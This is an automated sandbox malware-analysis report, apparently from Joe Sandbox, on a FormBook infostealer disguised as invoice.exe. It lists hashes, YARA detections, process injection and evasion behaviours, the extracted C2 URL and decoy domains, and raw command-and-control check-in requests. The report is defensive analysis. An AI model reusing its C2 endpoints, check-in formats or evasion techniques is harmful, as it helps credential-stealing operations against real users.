Analysis Report invoice.exe

Overview

General Information

Sample Name: invoice.exe
Analysis ID: 383898
MD5: 492017e064cab97dd8ea27abd3e5cfca
SHA1: a3addbdea8245b2e16c6ef551755b9d0e66e8e2b
SHA256: 524306af2db603c7db95227603c3014b67c27cfb2f88d12de2a599ece24575e2
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • invoice.exe (PID: 1972 cmdline: 'C:\Users\user\Desktop\invoice.exe' MD5: 492017E064CAB97DD8EA27ABD3E5CFCA)
    • invoice.exe (PID: 480 cmdline: C:\Users\user\Desktop\invoice.exe MD5: 492017E064CAB97DD8EA27ABD3E5CFCA)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 5064 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6164 cmdline: /c del 'C:\Users\user\Desktop\invoice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.sookepointcargo.com/e3rs/"], "decoy": ["mcni360clientapp.com", "dateyourlovelive.club", "amongugadu.com", "jarruslogistics.com", "jeejwbvf.icu", "amnil-wecu.xyz", "armaccountingbs.com", "revistadedisseny.com", "aqiyi.club", "cuchdblackboard.com", "hancement.info", "humanizantes.com", "slingshotct.com", "degen.fund", "onemindtransformed.com", "theunlearningjourney.com", "zmid.xyz", "profirma-nachfolge.com", "curiget.xyz", "officinadellapappa.com", "leverage.community", "improvetechprocess.com", "legacyadmin.support", "quantumwater.info", "gsinghproperties.com", "gigbager.com", "menpeeinthesink.com", "ultimate.icu", "hotelmaktub.com", "arizonagridiron.com", "rvsmiami.com", "allzodiac.com", "knoxvilleoutdoorkitchens.com", "gunungbatufrozen.com", "keystone-sd.com", "positiveagenda-consulting.com", "harshdeepfashion.com", "imetmymurdereronline.com", "thesnackculture.com", "carolinapropertiessolution.com", "prfectskin.com", "okaog.com", "highdeserthealthinsurance.com", "ovelgonne.com", "tgcmaine.com", "jinlan.online", "airportlimo4u.com", "serendipity-collective.com", "bibeiw.com", "unagelo.com", "pageonefourplay.info", "apmrfgpu.icu", "cognitiveautomationtool.com", "applelucycooking.com", "can-march.xyz", "modernmarvelrealtors.com", "panasianetwork.net", "flowhcf.com", "earwaxsux.com", "konakia.net", "bges301.com", "rosuba.com", "hedgetheory.com", "myyearwithoutjews.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.invoice.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.invoice.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.invoice.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158c9:$sqlite3step: 68 34 1C 7B E1
  • 0x159dc:$sqlite3step: 68 34 1C 7B E1
  • 0x158f8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
  • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
3.2.invoice.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.invoice.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: invoice.exe | Joe Sandbox ML: detected
Source: 3.2.invoice.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: invoice.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: invoice.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscript.pdbGCTL source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe, 00000009.00000002.492637672.000000000475F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: invoice.exe, 00000003.00000002.287622749.00000000018CF000.00000040.00000001.sdmp, wscript.exe
Source: Binary string: wscript.pdb source: invoice.exe, 00000003.00000002.288057088.0000000001B70000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\invoice.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\invoice.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\invoice.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\invoice.exe | Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h
Source: C:\Users\user\Desktop\invoice.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 4x nop then pop esi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 208.91.197.91:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49732 -> 177.55.108.130:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.sookepointcargo.com/e3rs/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.zmid.xyz
Source: global traffic | HTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=7EcTScmBGLYmOphx6WmAanuMW8SmjCZcy1cTUFzuZxTbodjrouz1iofcKvfRvNdFU6cO HTTP/1.1 | Host: www.flowhcf.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=0ZKu2HAGzvZQR/qsYgBhCWXzZU+pty94akjoW6oXtCN964+Lsvy2TInFlM7SmRuoaV8X HTTP/1.1 | Host: www.jinlan.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?w0G=UjY/ETYDec4qhoizf7RP+uVqhCLoGuhip7tAF9t9xQZdbBeLWBLuGPY37yNXVCM5GTyP&uFQl=XP7HMT_8 HTTP/1.1 | Host: www.armaccountingbs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?w0G=3w4QHVrJOCimt90ZTeKXMe7ZrYb4bnkzv7QZzufjPqhFBPGQ1SrJ/wFsHy6lqdqQBlr0&uFQl=XP7HMT_8 HTTP/1.1 | Host: www.knoxvilleoutdoorkitchens.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?w0G=7ZSYqSAb20IhJodkc2ZZv2+VQiffweVGAnhTkqT9MP7KQ1W755ixlatoWnihL/C2wZs0&uFQl=XP7HMT_8 HTTP/1.1 | Host: www.highdeserthealthinsurance.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?uFQl=XP7HMT_8&w0G=Ok77fVcdVMfIiR4pMXON/NN29f2Jfu2AMoU186FmLUOu6U92Y3SpeQqKBhzvmDYI2dCa HTTP/1.1 | Host: www.hotelmaktub.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J+dvoSMZhdpoUDtYYFWxv9npQwlOrxt3zkZH4aLHtWZT3&uFQl=XP7HMT_8 HTTP/1.1 | Host: www.legacyadmin.support | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 192.0.78.24
Source: Joe Sandbox View | IP Address: 208.91.197.91
Source: Joe Sandbox View | ASN Name: AUTOMATTICUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG
Source: unknown | DNS traffic detected: queries for: www.flowhcf.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.16.1 | Date: Thu, 08 Apr 2021 10:04:37 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmp, invoice.exe, 00000000.00000002.245138274.0000000002EA1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: invoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: wscript.exe, 00000009.00000002.494442857.0000000004CF2000.00000004.00000001.sdmp | String found in binary or memory: http://www.knoxvilleoutdoorkitchens.com/?fp=acjVxO24ruBE1bSnAJOOFeZ9d2%2Bill3hWebcMHeneryqde34aljK8g
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: invoice.exe | String found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
Source: invoice.exe | String found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
Source: invoice.exe | String found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
Source: invoice.exe, 00000000.00000002.245201549.0000000002EB3000.00000004.00000001.sdmp | String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: wscript.exe, 00000009.00000002.494442857.0000000004CF2000.00000004.00000001.sdmp | String found in binary or memory: https://www.legacyadmin.support/e3rs/?w0G=0yUiwx1wLvxUfzb5kCZXOl2J

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.490575290.0000000002AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.287914993.0000000001AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.286861103.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.287952464.0000000001B10000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.490405309.00000000026A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.488897398.00000000021B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.246170025.0000000003EAC000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample Static PE information: Filename: invoice.exe
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_004181D0 NtCreateFile,
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_00418280 NtReadFile,
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_00418300 NtClose,
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_0041827A NtReadFile,
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_004182FB NtReadFile,
          Source: C:\Users\user\Desktop\invoice.exe Code function: 3_2_004183AA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_046A95D0 NtClose,LdrInitializeThunk,
